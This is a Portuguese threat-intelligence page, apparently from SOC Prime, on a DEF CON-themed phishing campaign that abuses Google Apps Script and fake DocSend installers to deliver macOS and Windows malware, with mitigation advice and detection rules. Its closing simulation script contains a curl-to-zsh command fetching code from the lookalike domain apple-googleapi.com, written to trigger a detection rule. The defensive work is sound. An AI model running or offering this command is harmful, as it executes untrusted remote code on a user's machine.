SOC Prime Bias: High

21 Aug 2026 16:11 UTC

Phishing Temático do DEF CON Abusa do Google Apps Script para Entrega de Malware

Author Photo
SOC Prime Team linkedin icon Seguir
Phishing Temático do DEF CON Abusa do Google Apps Script para Entrega de Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Atores de ameaça estão visando participantes de conferências de cibersegurança através de engenharia social no X, anteriormente Twitter, para distribuir malware usando Google Docs armados e instaladores fraudulentos do DocSend. A campanha entrega AMOS infostealer para usuários de macOS, enquanto vítimas no Windows recebem uma carga útil em várias etapas, envolvendo NetSupport RAT e um implante de carteira Ledger. O ataque abusa de barras laterais do Google Apps Script e prompts no estilo ClickFix para reduzir a suspeita e acionar a execução de código malicioso.

Investigação

Pesquisadores da Huntress interagiram com o ator da ameaça enquanto se passavam por um executivo da CoinDesk para observar toda a cadeia de ataque. A investigação revelou um processo sofisticado em várias etapas envolvendo Google Apps Script, instaladores falsos assinados com certificados roubados e um proxy local que intercepta TLS no Windows. Pesquisadores também identificaram uma etapa secundária que executa JavaScript na memória e implanta uma Autoridade Certificadora maliciosa.

Mitigação

Os usuários devem tratar solicitações inesperadas para executar comandos no terminal, ignorar o Gatekeeper ou instalar atualizações manuais de barras laterais de documentos como suspeitas. Organizações devem monitorar atividades incomuns do Google Apps Script e o uso não autorizado de certificados de assinatura de código. Controles de endpoint fortes e verificação independente de links de compartilhamento de documentos podem reduzir ainda mais a exposição.

Resposta

Se uma atividade maliciosa for detectada, o sistema afetado deve ser isolado imediatamente para parar a exfiltração de dados ou movimento lateral. Os respondedores devem preservar as evidências forenses e considerar a reimagem do dispositivo enquanto tratam as credenciais locais e dados de carteira de criptomoeda como comprometidos. Sessões ativas devem ser revogadas, senhas redefinidas e todas as chaves de API ou segredos armazenados no sistema rotacionados.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

Comando e Controle Suspeitos por Solicitação DNS de Domínio de Nível Superior (TLD) Incomum (via dns)

Equipe SOC Prime
21 de agosto de 2026

Tentativa Suspeita de Execução de Curl [MacOS] (via cmdline)

Equipe SOC Prime
20 de agosto de 2026

Possível Execução pelo Uso de Nome de Script Curto (via cmdline)

Equipe SOC Prime
20 de agosto de 2026

Chamar Métodos .NET Suspeitos do Powershell (via powershell)

Equipe SOC Prime
20 de agosto de 2026

IOCs (HashSha256) para detectar: Phishing Pós-DEF CON Usa Google Doc Apps Script para Entregar Malware

Regras AI do SOC Prime
20 de agosto de 2026

IOCs (HashMd5) para detectar: Phishing Pós-DEF CON Usa Google Doc Apps Script para Entregar Malware

Regras AI do SOC Prime
20 de agosto de 2026

IOCs (SourceIP) para detectar: Phishing Pós-DEF CON Usa Google Doc Apps Script para Entregar Malware

Regras AI do SOC Prime
20 de agosto de 2026

IOCs (DestinationIP) para detectar: Phishing Pós-DEF CON Usa Google Doc Apps Script para Entregar Malware

Regras AI do SOC Prime
20 de agosto de 2026

Detecção de DocSend e Implantação de NetSupport RAT Trojanizados [Criação de Processo do Windows]

Regras AI do SOC Prime
20 de agosto de 2026

Execução Potencial de Script Shell Malicioso no macOS [Criação de Processo Linux]

Regras AI do SOC Prime
20 de agosto de 2026

Detecção de Comunicação Maliciosa e Entrega de Payload [Conexão de Rede do Windows]

Regras AI do SOC Prime
20 de agosto de 2026

Detectar Criação e Execução de Script Malicioso do PowerShell [Windows Powershell]

Regras AI do SOC Prime
20 de agosto de 2026

## Execução de Simulação

Pré-requisito: O check pré-voo de Telemetria & Baseline deve ter sido aprovado.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e narrativas DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa & Comandos de Ataque: O adversário visa ganhar acesso inicial em uma estação de trabalho macOS se passando por um processo legítimo de atualização de API do Google. Eles utilizam uma tática de engenharia social onde o usuário é instruído a executar um comando no Terminal. O comando usa curl para buscar um payload de apple-googleapi.com (um domínio semelhante/para typosquatting) e redireciona a saída diretamente para zsh. Esta abordagem de “viver da terra” tenta minimizar a pegada forense no sistema de arquivos executando o código diretamente do fluxo de rede.

  • Script de Teste de Regressão:

    #!/bin/bash
    # Script de simulação para acionar a regra "Execução Potencial de Script Shell Malicioso".
    # Nota: Usamos uma URL fictícia que imita a estrutura do domínio para evitar chamadas externas reais, se desejado, 
    # mas para a regra acionar, a linha de comando DEVE conter 'apple-googleapi.com'.
    
    echo "[*] Iniciando simulação: Imitando tubo shell malicioso..."
    
    # Este comando satisfaz todas as condições: 
    # 1. O processo é zsh/sh/bash 
    # 2. Contém 'curl' 
    # 3. Contém '| zsh' 
    # 4. Contém 'apple-googleapi.com'
    
    # Usamos uma URL inexistente para evitar a execução real do payload enquanto ainda geramos a telemetria.
    curl -s http://apple-googleapi.com/update.sh | zsh
    
    echo "[*] Comando de simulação enviado."
  • Comandos de Limpeza:

    # Nenhum arquivo é criado no disco pelo próprio comando de ataque, 
    # mas se quaisquer artefatos forem gerados, eles devem ser removidos.
    rm -f ~/Downloads/update.sh 2>/dev/null
    echo "[*] Limpeza concluída."